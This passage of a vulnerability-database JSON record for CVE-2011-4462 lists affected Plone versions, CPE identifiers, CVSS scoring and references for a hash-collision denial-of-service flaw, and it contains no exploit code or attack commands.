"plone:plone", "name": "plone", "operator": "eq", "version": "3.2.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:plone:plone:3.1.5.1", "cpe:/a:plone:plone:2.5.3", "cpe:/a:plone:plone:3.3.5", "cpe:/a:plone:plone:2.0.1", "cpe:/a:plone:plone:4.1.3", "cpe:/a:plone:plone:1.0", "cpe:/a:plone:plone:3.0", "cpe:/a:plone:plone:4.0.5", "cpe:/a:plone:plone:1.0.1", "cpe:/a:plone:plone:4.0.2", "cpe:/a:plone:plone:2.5.2", "cpe:/a:plone:plone:2.5.4", "cpe:/a:plone:plone:4.0", "cpe:/a:plone:plone:3.0.1", "cpe:/a:plone:plone:3.0.2", "cpe:/a:plone:plone:3.2", "cpe:/a:plone:plone:4.0.7", "cpe:/a:plone:plone:3.0.6", "cpe:/a:plone:plone:1.0.4", "cpe:/a:plone:plone:3.3.1", "cpe:/a:plone:plone:4.0.3", "cpe:/a:plone:plone:2.0.5", "cpe:/a:plone:plone:4.0.4", "cpe:/a:plone:plone:3.3.6", "cpe:/a:plone:plone:2.0", "cpe:/a:plone:plone:3.2.1", "cpe:/a:plone:plone:3.1.6", "cpe:/a:plone:plone:3.3", "cpe:/a:plone:plone:3.3.3", "cpe:/a:plone:plone:3.2.3", "cpe:/a:plone:plone:3.0.5", "cpe:/a:plone:plone:4.1.1", "cpe:/a:plone:plone:2.5.5", "cpe:/a:plone:plone:4.0.1", "cpe:/a:plone:plone:2.1.3", "cpe:/a:plone:plone:3.1.2", "cpe:/a:plone:plone:1.0.5", "cpe:/a:plone:plone:2.5.1", "cpe:/a:plone:plone:3.1.7", "cpe:/a:plone:plone:2.1.2", "cpe:/a:plone:plone:3.1.3", "cpe:/a:plone:plone:3.3.2", "cpe:/a:plone:plone:2.0.2", "cpe:/a:plone:plone:3.1", "cpe:/a:plone:plone:2.1", "cpe:/a:plone:plone:3.3.4", "cpe:/a:plone:plone:4.1", "cpe:/a:plone:plone:1.0.2", "cpe:/a:plone:plone:3.2.2", "cpe:/a:plone:plone:1.0.6", "cpe:/a:plone:plone:3.1.1", "cpe:/a:plone:plone:1.0.3", "cpe:/a:plone:plone:4.1.2", "cpe:/a:plone:plone:2.0.3", "cpe:/a:plone:plone:4.0.9", "cpe:/a:plone:plone:2.0.4", "cpe:/a:plone:plone:3.0.3", "cpe:/a:plone:plone:2.5", "cpe:/a:plone:plone:2.1.1", "cpe:/a:plone:plone:2.1.4", "cpe:/a:plone:plone:3.1.4", "cpe:/a:plone:plone:3.0.4"], "cpe23": ["cpe:2.3:a:plone:plone:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.5.1:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.2.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.2.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.1.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.6:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.7:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.6:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.1.3:*:*:*:*:*:*:*", "versionEndIncluding": "4.1.3", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.7:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.6:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.9:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.6:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.5.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.2.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.2:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2011-4462"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-20"], "description": "Plone 4.1.3 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-11-29T23:05:24", "references": [{"idList": ["GHSA-PCWM-8JC3-QXVJ"], "type": "github"}, {"idList": ["SECURITYVULNS:DOC:27500"], "type": "securityvulns"}, {"idList": ["SSV:26121"], "type": "seebug"}], "rev": 2}, "score": {"modified": "2020-11-29T23:05:24", "rev": 2, "value": 5.5, "vector": "NONE"}}, "hash": "fac4960ceb1e1787580188e26e9ea9a81bf78eac71d54a8bd4e600f41073459c", "hashmap": [{"hash": "19e5f52d89b2f1049b95fe11b3e2f92d", "key": "cpeConfiguration"}, {"hash": "bcb9298e9dedfc5a20fdb3b772b56354", "key": "cvelist"}, {"hash": "13f9056adf02b8cd9f68359a4c55c94c", "key": "cpe23"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "79f130ef461e5fcadeacc002df89c60a", "key": "modified"}, {"hash": "8ee79e05af07bf9f5b1f16b80ef48a0f", "key": "description"}, {"hash": "272f4cdb9efa2b45de25b45c68585342", "key": "title"}, {"hash": "25d8c9d6f2d4709ad0ad6212d8369d9c", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "63d1dafed59d9bded2a524b239235cfd", "key": "published"}, {"hash": "f4d808534394c075bbc3f1357cfa6f9d", "key": "affectedSoftware"}, {"hash": "85fc9715d07b57d9e72056856b007c7b", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "736a1ed0b7d76613eddb0b0826033359", "key": "references"}, {"hash": "41b62a8aa1ee5c40897717cadc30784a", "key": "cvss"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "ef8dc55e27badb345f85c3696c61eb1d", "key": "href"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4462", "id": "CVE-2011-4462", "lastseen": "2020-11-29T23:05:24", "modified": "2017-08-29T01:30:00", "objectVersion": "1.3", "published": "2011-12-30T01:55:00", "references": ["http://www.nruns.com/_downloads/advisory28122011.pdf", "http://archives.neohapsis.com/archives/bugtraq/2011-12/0181.html", "http://secunia.com/advisories/47406", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/72018"], "reporter": "cve@mitre.org", "title": "CVE-2011-4462", "type": "cve", "viewCount": 8}, "differentElements": ["affectedSoftware"], "edition": 4, "lastseen": "2020-11-29T23:05:24"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.2.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.9"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.7"}, {"cpeName": "plone:plone", "name": "plone", "operator": "le", "version": "4.1.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.1.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.6"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.1.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.6"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.6"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.2.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.6"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.5.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.7"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.2.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:plone:plone:3.1.5.1", "cpe:/a:plone:plone:2.5.3", "cpe:/a:plone:plone:3.3.5", "cpe:/a:plone:plone:2.0.1", "cpe:/a:plone:plone:4.1.3", "cpe:/a:plone:plone:1.0", "cpe:/a:plone:plone:3.0", "cpe:/a:plone:plone:4.0.5", "cpe:/a:plone:plone:1.0.1", "cpe:/a:plone:plone:4.0.2", "cpe:/a:plone:plone:2.5.2", "cpe:/a:plone:plone:2.5.4", "cpe:/a:plone:plone:4.0", "cpe:/a:plone:plone:3.0.1", "cpe:/a:plone:plone:3.0.2", "cpe:/a:plone:plone:3.2", "cpe:/a:plone:plone:4.0.7", "cpe:/a:plone:plone:3.0.6", "cpe:/a:plone:plone:1.0.4", "cpe:/a:plone:plone:3.3.1", "cpe:/a:plone:plone:4.0.3", "cpe:/a:plone:plone:2.0.5", "cpe:/a:plone:plone:4.0.4", "cpe:/a:plone:plone:3.3.6", "cpe:/a:plone:plone:2.0", "cpe:/a:plone:plone:3.2.1", "cpe:/a:plone:plone:3.1.6", "cpe:/a:plone:plone:3.3", "cpe:/a:plone:plone:3.3.3", "cpe:/a:plone:plone:3.2.3", "cpe:/a:plone:plone:3.0.5", "cpe:/a:plone:plone:4.1.1", "cpe:/a:plone:plone:2.5.5", "cpe:/a:plone:plone:4.0.1", "cpe:/a:plone:plone:2.1.3", "cpe:/a:plone:plone:3.1.2", "cpe:/a:plone:plone:1.0.5", "cpe:/a:plone:plone:2.5.1", "cpe:/a:plone:plone:3.1.7", "cpe:/a:plone:plone:2.1.2", "cpe:/a:plone:plone:3.1.3", "cpe:/a:plone:plone:3.3.2", "cpe:/a:plone:plone:2.0.2", "cpe:/a:plone:plone:3.1", "cpe:/a:plone:plone:2.1", "cpe:/a:plone:plone:3.3.4", "cpe:/a:plone:plone:4.1", "cpe:/a:plone:plone:1.0.2", "cpe:/a:plone:plone:3.2.2", "cpe:/a:plone:plone:1.0.6", "cpe:/a:plone:plone:3.1.1", "cpe:/a:plone:plone:1.0.3", "cpe:/a:plone:plone:4.1.2", "cpe:/a:plone:plone:2.0.3", "cpe:/a:plone:plone:4.0.9", "cpe:/a:plone:plone:2.0.4", "cpe:/a:plone:plone:3.0.3", "cpe:/a:plone:plone:2.5", "cpe:/a:plone:plone:2.1.1", "cpe:/a:plone:plone:2.1.4", "cpe:/a:plone:plone:3.1.4", "cpe:/a:plone:plone:3.0.4"], "cpe23": ["cpe:2.3:a:plone:plone:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3:*:*:*:*:*:*:*", 